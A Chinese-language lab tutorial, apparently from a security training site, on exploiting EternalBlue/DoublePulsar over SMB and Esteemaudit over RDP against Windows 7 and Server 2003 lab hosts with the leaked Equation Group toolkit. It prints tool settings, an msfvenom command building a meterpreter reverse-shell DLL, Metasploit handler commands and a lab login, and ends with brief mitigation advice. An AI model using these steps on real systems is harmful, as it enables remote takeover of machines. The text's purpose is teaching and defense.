永恒之蓝3389漏洞原理详解解析

admin管理员组

文章数量:1530844

2024年7月14日发(作者：)

实验环境

•

操作机：Windows XP

o

IP : 172.16.11.2

•

操作机：Kali Linux

o

IP : 172.16.12.2

•

目标机：Windows 7 64位

o

IP : 172.16.12.3

•

目标机：Windows Server 2003

o

IP : 172.16.12.4

•

掌握工具的用法以及临时防御措施

实验步骤

实验工具

•

Metasploit ：是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别

安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全

风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程等

•

Equation Group Tools：这是一个集成的工具包，里面包含了IIS6.0、445端

口、3389端口、Rootkit等远程利用工具，本次试验我们主要用到它的445端口远程入

侵功能，以及3389远程端口入侵功能。

实验内容

Shadow Brokers再次暴露出一份震惊世界的机密文档，其中包含了多个Windows

远程漏洞利用工具，可以覆盖大量的 Windows 服务器，一夜之间所有Windows服务

器几乎全线暴露在危险之中，任何人都可以直接下载并远程攻击利用，考虑到国内不少高

校、政府、国企甚至还有一些互联网公司还在使用 Windows 服务器，这次事件影响力

堪称网络大地震。

影响版本

全球 70% 的 Windows 服务器，包括Windows NT、Windows 2000、Windo

ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2

008、Windows 2008 R2、Windows Server 2012 SP0

危害

攻击者通过执行脚本，使目标主机蓝屏重启，获取Windows目标主机权限，对目标

机器进行任意操作，攻击成本和利用条件都很低，只需在本地执行脚本，并设置相关参

数。一旦攻击成功，攻击者能直接控制目标主机，甚至直接下载数据库，盗取商业机密，

很多的政府、事业单位都会受到影响，影响极大，危害不言而喻。

步骤1：利用Eternalblue与Doublepulsar插件，验证445 SMB漏洞

我们本步骤利用Eternalblue 和 Doublepulsar 这两个"插件"来获取Windows 7 6

4位的系统权限。

其中Eternalblue可以利用SMB漏洞，获取Windows 7 系统权限

而Doublepulsar可以加载Metasploit生成的恶意DLL。

我们首先进入cmd命令行，在命令行中进入文件夹：

cd C:EQGRP_Lost_in_Translation-master/Windows

输入命令：

//运行python文件

注：在一般情况下需要在工具根目录下创建listeningposts文件夹，否则运行文件

时，会报错。

接下来依次填入对应信息：

172.16.12.3 //目标IP

172.16.11.2 //本地IP

no //取消重定向

c:logs //指定日志文件目录

继续填入相关新信息：

0 //创建一个新项目

Test_Win7 //项目名称

Yes //确认路径

到这里就完成了最基本的信息配置，正式启动了脚本，接下来继续进行配置，这时就

要用到第一个插件了，使用命令：

use Eternalblue //使用Eternalblue

注意这里要选择操作系统、系统位数、传输方式，我们分别选择Windows 7、64

位、FB传输方式，其他配置信息直接按回车键，保持默认即可。

当看到Eternalblue Succeeded字样，代表成功。

接下来需要用到Metasploit ，使用Everything搜索并使用XShell连接到Kali Lin

ux：

连接成功后，使用如下命令生成恶意DLL：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LP

ORT=12399 -f dll >

这时，/home目录下就会生成文件，然后使用如下命令进入Metasploit，

设置TCP监听端口，用于接受攻击成功后返回的Shell：

msfconsole

use exploit/multi/handler //使用监听模块

set payload windows/x64/meterpreter/reverse_tcp //设置payload

show options //查看配置信息

set LHOST 172.16.12.2 //设置本地IP

set LPORT 12399 //设置本地端口

run //运行

如图，Metasploit已经成功运行，等待Shell的返回。

现在将之前生成的文件通过FTP复制到Windows机器上：

首先点击下图中使用红色小框标示的图

标：

本文中，我将dll文件放在C盘根目录：

接下来使用Doublepulsar 来加载生成的dll文件。

注：这里系统位数、后门操作、后门路径，我们分别选择64位、RunDLL、c:win.

dll，其他保持默认即可

配置完之后，提示成功。

我们再来查看Metasploit

可以看到，成功的利用了插件，已经获取了Shell。然后退回操作机cmd命令行下,

重新运行.准备进行下一步骤.

步骤2：利用Esteemaudit插件，验证3389 RDP漏洞

本步骤利用Esteemaudit插件，来验证漏洞存在。(本步骤的目标地址为172.16.12.

4)

与上一步骤一样，首先设置基本信息，这里就不在赘述：

基本信息配置完成之后，下面对ESTEEMAUDIT 插件进行配置：

use ESTEEMAUDIT //使用ESTEEMAUDIT插件

这里我将CallbackPort设置为8899端口（其他端口也可

以）

手动加载rudo_和capa_ ，因为插件默认选项都在D盘，它不能识别

安装目录，我们复制之前位置，位于C:EQGRP_Lost_in_Translation-masterwindows

storage ，如

图：

手动加载 lipa_ ，原因同

上：

其他保持默认即可。

可以看到，成功执行。（同学们也可以使用3389端口对Windows Server 2003进

行登录,目标IP为172.16.12.4，账号密码为 [administrator，ichunqiu123. ]，使用命

令netstat -ant 查看是否成功连接）

实验结果分析与总结

本次实验我们成功的使用工具Eternalblue、Doublepulsar、ESTEEMAUDIT对SM

B、RDP协议漏洞进行了演示攻击。

临时修复方案

•

使用防火墙过滤/关闭 137、139、445端口。

•

对于 3389 远程登录，如果不想关闭的话，至少要关闭智能卡登录功能。

•

升级补丁，更新系统。

思考

本文中对445和3389端口进行了验证，请在课下尝试对其他的协议、Payload以及

其他系统进行尝试。

本文标签： 使用利用进行漏洞工具